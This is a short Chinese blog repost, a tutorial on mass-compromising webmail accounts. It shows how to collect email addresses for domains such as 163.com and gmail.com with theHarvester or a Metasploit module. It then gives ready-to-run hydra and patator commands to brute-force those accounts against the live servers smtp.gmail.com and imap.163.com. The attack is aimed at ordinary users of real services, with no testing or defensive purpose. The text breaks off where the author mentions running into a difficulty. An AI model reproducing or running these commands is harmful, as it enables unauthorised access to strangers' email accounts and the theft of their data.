(转载)Theharvester+Hydra批量扫弱口令账户

adminlzzs

theHarvester是一个社会工程学工具，它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email，子域名，主机，雇员名，开放端口和banner信息；

例如以下为扫描baidu.com的简单信息：

但是这里我们即将使用的是利用theHarvester的扫描在线账户的功能，例如邮箱帐号；简单用法：
$ theHarvester -d 163.com -l 1000 -b google
       -d 后跟服务器域名    163.com  hotmail.com  gmail.com  126.com  qq.com ... ...
      -l  限制显示数目      
      -b  调用搜索引擎（google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw，all）
         这样扫描的是以163.com为域名的所有服务器的管理员帐号和所有目前在线的帐号，所以每隔 一段时间扫描的结果是不一样的，除了网站管理员帐号不变外；别忘了google.com是要挂vpn才能访问的！

或者也可以使用metasploit的 auxiliary/gather/search_email_collector 模块：



然后把扫描结果保存为txt，使用在线密码破解软件就可以批量暴力破解了；例如：


  hydra -S -L file/gmail.com.txt -P file/password.txt -e ns -V -s 465 smtp.gmail.com smtp
  hydra -L file/163.com.txt -P file/password.txt -e ns -V -t 40 imap.163.com imap
  patator imap_login host=imap.163.com user=FILE0 password=FILE1 0=file/163.com.txt 1=file/passwords.txt
。。。 。。。
因为每隔一段时间扫描到的账户一般是不同的，所以这个账户文档可以越来越丰富。。。

想法是丰满的，现实是骨感的；貌似现在遇到了点困难：